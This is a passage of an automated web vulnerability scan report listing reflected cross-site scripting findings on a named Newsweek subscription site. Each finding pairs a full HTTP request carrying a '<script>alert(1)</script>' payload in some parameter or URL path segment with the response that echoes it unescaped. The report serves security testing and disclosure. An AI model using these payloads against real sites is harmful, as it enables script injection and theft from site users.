<meta name="Keywords" content="Title:Newsweek, Newsweek Magazine, Newsweek Subscription, Newsweek Magazine Su
...[SNIP]...
ion()
{
   if (openguard_busy==1) { return; }
   openguard_busy=1;

   var url = "index.php?submitted=V&kind=guard&t=&extra_info=&extra_info2=";

url += '&off2on_login_url=/promo5b713';alert(1)//66c9d26a207';

url += '&off2on_code=TDBNAV';

       if ((guard_win==null) && (document.cookie.indexOf('guard')==-1)) {
        //alert('
...[SNIP]...

1.238. https://www.newsweeksubscriptions.com/FTcontrol/index.php [paym parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/index.php

Issue detail

The value of the paym request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86ae7"><script>alert(1)</script>7e268a9164ba3f7 was submitted in the paym parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /FTcontrol/index.php?template_id=new2_lp3&offer=USPLPNEWSWEEK277DBA&name=&address=&address2=&city=&zipcode=&state=AK&email=&bill_name=&bill_address=&bill_address2=&bill_city=&bill_zipcode=&bill_state=&bill_country=US&cc_number=&cc_month=&cc_year=&cc_type=billme&isgift=personal_gift&use_billing=0&semail=&list=&campaign_type=&kind=lp&interextra=&kindid=&submitted=Y&site=newsweek&sessid=276b5e968c4ce6c9eaf6438a0420af5d&sub_type=personal&paym=86ae7"><script>alert(1)</script>7e268a9164ba3f7&upsellto= HTTP/1.1
Referer: https://www.newsweeksubscriptions.com/FTcontrol/index.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:16:00 GMT
Server: Apache/2.2.16 (Unix)
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 20701

<html>
<head>
<title>Newsweek</title>

<script type="text/javascript" src="/js/prototype.js"></script>
<script type="text/javascript" src="/js/jquery-1.4.2.min.js"></script>
<script type="text/javas
...[SNIP]...
<input autocomplete="off" type="hidden" name="paym" id="paym" value="86ae7"><script>alert(1)</script>7e268a9164ba3f7">
...[SNIP]...

1.239. https://www.newsweeksubscriptions.com/FTcontrol/index.php [sessid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/index.php

Issue detail

The value of the sessid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b02f"><script>alert(1)</script>163c0375087e87f2c was submitted in the sessid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /FTcontrol/index.php?template_id=new2_lp3&offer=USPLPNEWSWEEK277DBA&name=&address=&address2=&city=&zipcode=&state=AK&email=&bill_name=&bill_address=&bill_address2=&bill_city=&bill_zipcode=&bill_state=&bill_country=US&cc_number=&cc_month=&cc_year=&cc_type=billme&isgift=personal_gift&use_billing=0&semail=&list=&campaign_type=&kind=lp&interextra=&kindid=&submitted=Y&site=newsweek&sessid=276b5e968c4ce6c9eaf6438a0420af5d1b02f"><script>alert(1)</script>163c0375087e87f2c&sub_type=personal&paym=&upsellto= HTTP/1.1
Referer: https://www.newsweeksubscriptions.com/FTcontrol/index.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:15:56 GMT
Server: Apache/2.2.16 (Unix)
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 20703

<html>
<head>
<title>Newsweek</title>

<script type="text/javascript" src="/js/prototype.js"></script>
<script type="text/javascript" src="/js/jquery-1.4.2.min.js"></script>
<script type="text/javas
...[SNIP]...
<input autocomplete="off" type="hidden" name="sessid" id="sessid" value="276b5e968c4ce6c9eaf6438a0420af5d1b02f"><script>alert(1)</script>163c0375087e87f2c">
...[SNIP]...

1.240. https://www.newsweeksubscriptions.com/FTcontrol/index.php [state parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/index.php

Issue detail

The value of the state request parameter is copied into the HTML document as plain text between tags. The payload 9ec71<script>alert(1)</script>48aa07ff265b6b0ec was submitted in the state parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /FTcontrol/index.php?template_id=new2_lp3&offer=USPLPNEWSWEEK277DBA&name=&address=&address2=&city=&zipcode=&state=AK9ec71<script>alert(1)</script>48aa07ff265b6b0ec&email=&bill_name=&bill_address=&bill_address2=&bill_city=&bill_zipcode=&bill_state=&bill_country=US&cc_number=&cc_month=&cc_year=&cc_type=billme&isgift=personal_gift&use_billing=0&semail=&list=&campaign_type=&kind=lp&interextra=&kindid=&submitted=Y&site=newsweek&sessid=276b5e968c4ce6c9eaf6438a0420af5d&sub_type=personal&paym=&upsellto= HTTP/1.1
Referer: https://www.newsweeksubscriptions.com/FTcontrol/index.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:15:51 GMT
Server: Apache/2.2.16 (Unix)
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 20701

<html>
<head>
<title>Newsweek</title>

<script type="text/javascript" src="/js/prototype.js"></script>
<script type="text/javascript" src="/js/jquery-1.4.2.min.js"></script>
<script type="text/javas
...[SNIP]...
<br>
, AK9ec71<script>alert(1)</script>48aa07ff265b6b0ec <br>
...[SNIP]...

1.241. https://www.newsweeksubscriptions.com/FTcontrol/newsweek@emailcustomerservice.com [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/newsweek@emailcustomerservice.com

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2edad<script>alert(1)</script>02ccb64bc54 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /FTcontrol2edad<script>alert(1)</script>02ccb64bc54/newsweek@emailcustomerservice.com HTTP/1.1
Referer: https://www.newsweeksubscriptions.com/FTcontrol/index.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:13:20 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 555
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol2edad<script>alert(1)</script>02ccb64bc54/newsweek@emailcustomerservice.com is not found !</p>
...[SNIP]...

1.242. https://www.newsweeksubscriptions.com/FTcontrol/newsweek@emailcustomerservice.com [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/newsweek@emailcustomerservice.com

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 98f78<script>alert(1)</script>9ea529c6ac0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /FTcontrol/newsweek@emailcustomerservice.com98f78<script>alert(1)</script>9ea529c6ac0 HTTP/1.1
Referer: https://www.newsweeksubscriptions.com/FTcontrol/index.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:14:16 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 807
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/newsweek@emailcustomerservice.com98f78<script>alert(1)</script>9ea529c6ac0 is not found !</p>
...[SNIP]...

1.243. https://www.newsweeksubscriptions.com/FTcontrol/newsweek@emailcustomerservice.com/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/newsweek@emailcustomerservice.com/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 12bcf<script>alert(1)</script>1936c9c86f7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontrol12bcf<script>alert(1)</script>1936c9c86f7/newsweek@emailcustomerservice.com/ HTTP/1.1
Referer: https://www.newsweeksubscriptions.com/FTcontrol/newsweek@emailcustomerservice.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:12:06 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 555
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol12bcf<script>alert(1)</script>1936c9c86f7/newsweek@emailcustomerservice.com is not found !</p>
...[SNIP]...

1.244. https://www.newsweeksubscriptions.com/FTcontrol/newsweek@emailcustomerservice.com/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/newsweek@emailcustomerservice.com/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload dcc53<script>alert(1)</script>663f9a33b8d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontrol/newsweek@emailcustomerservice.comdcc53<script>alert(1)</script>663f9a33b8d/ HTTP/1.1
Referer: https://www.newsweeksubscriptions.com/FTcontrol/newsweek@emailcustomerservice.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:12:47 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 807
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/newsweek@emailcustomerservice.comdcc53<script>alert(1)</script>663f9a33b8d is not found !</p>
...[SNIP]...

1.245. https://www.newsweeksubscriptions.com/FTcontrol/newsweek@emailcustomerservice.com/Netsparker0b594b604acd4cc2b9db63005bfbe9af/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/newsweek@emailcustomerservice.com/Netsparker0b594b604acd4cc2b9db63005bfbe9af/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5cf48<script>alert(1)</script>cbf6d265779 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontrol5cf48<script>alert(1)</script>cbf6d265779/newsweek@emailcustomerservice.com/Netsparker0b594b604acd4cc2b9db63005bfbe9af/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:13:14 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 598
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol5cf48<script>alert(1)</script>cbf6d265779/newsweek@emailcustomerservice.com/Netsparker0b594b604acd4cc2b9db63005bfbe9af is not found !</p>
...[SNIP]...

1.246. https://www.newsweeksubscriptions.com/FTcontrol/newsweek@emailcustomerservice.com/Netsparker0b594b604acd4cc2b9db63005bfbe9af/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/newsweek@emailcustomerservice.com/Netsparker0b594b604acd4cc2b9db63005bfbe9af/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e8cbd<script>alert(1)</script>071e967c869 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontrol/newsweek@emailcustomerservice.come8cbd<script>alert(1)</script>071e967c869/Netsparker0b594b604acd4cc2b9db63005bfbe9af/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:13:27 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 850
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/newsweek@emailcustomerservice.come8cbd<script>alert(1)</script>071e967c869/Netsparker0b594b604acd4cc2b9db63005bfbe9af is not found !</p>
...[SNIP]...

1.247. https://www.newsweeksubscriptions.com/FTcontrol/newsweek@emailcustomerservice.com/Netsparker0b594b604acd4cc2b9db63005bfbe9af/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/newsweek@emailcustomerservice.com/Netsparker0b594b604acd4cc2b9db63005bfbe9af/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9f5d0<script>alert(1)</script>4c2107201a6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontrol/newsweek@emailcustomerservice.com/Netsparker0b594b604acd4cc2b9db63005bfbe9af9f5d0<script>alert(1)</script>4c2107201a6/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:13:43 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 850
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/newsweek@emailcustomerservice.com/Netsparker0b594b604acd4cc2b9db63005bfbe9af9f5d0<script>alert(1)</script>4c2107201a6 is not found !</p>
...[SNIP]...

1.248. https://www.newsweeksubscriptions.com/FTcontrol/newsweek@emailcustomerservice.com/Netsparker589cd9fdeb73414b91501b3a353febd5/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/newsweek@emailcustomerservice.com/Netsparker589cd9fdeb73414b91501b3a353febd5/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload efa22<script>alert(1)</script>d2dabff9a4c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontrolefa22<script>alert(1)</script>d2dabff9a4c/newsweek@emailcustomerservice.com/Netsparker589cd9fdeb73414b91501b3a353febd5/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:14:30 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 598
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrolefa22<script>alert(1)</script>d2dabff9a4c/newsweek@emailcustomerservice.com/Netsparker589cd9fdeb73414b91501b3a353febd5 is not found !</p>
...[SNIP]...

1.249. https://www.newsweeksubscriptions.com/FTcontrol/newsweek@emailcustomerservice.com/Netsparker589cd9fdeb73414b91501b3a353febd5/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/newsweek@emailcustomerservice.com/Netsparker589cd9fdeb73414b91501b3a353febd5/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e725c<script>alert(1)</script>5041d66dcbf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontrol/newsweek@emailcustomerservice.come725c<script>alert(1)</script>5041d66dcbf/Netsparker589cd9fdeb73414b91501b3a353febd5/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:14:35 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 850
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/newsweek@emailcustomerservice.come725c<script>alert(1)</script>5041d66dcbf/Netsparker589cd9fdeb73414b91501b3a353febd5 is not found !</p>
...[SNIP]...

1.250. https://www.newsweeksubscriptions.com/FTcontrol/newsweek@emailcustomerservice.com/Netsparker589cd9fdeb73414b91501b3a353febd5/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/newsweek@emailcustomerservice.com/Netsparker589cd9fdeb73414b91501b3a353febd5/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5243f<script>alert(1)</script>5b2c7c01ebb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontrol/newsweek@emailcustomerservice.com/Netsparker589cd9fdeb73414b91501b3a353febd55243f<script>alert(1)</script>5b2c7c01ebb/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:14:39 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 850
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/newsweek@emailcustomerservice.com/Netsparker589cd9fdeb73414b91501b3a353febd55243f<script>alert(1)</script>5b2c7c01ebb is not found !</p>
...[SNIP]...

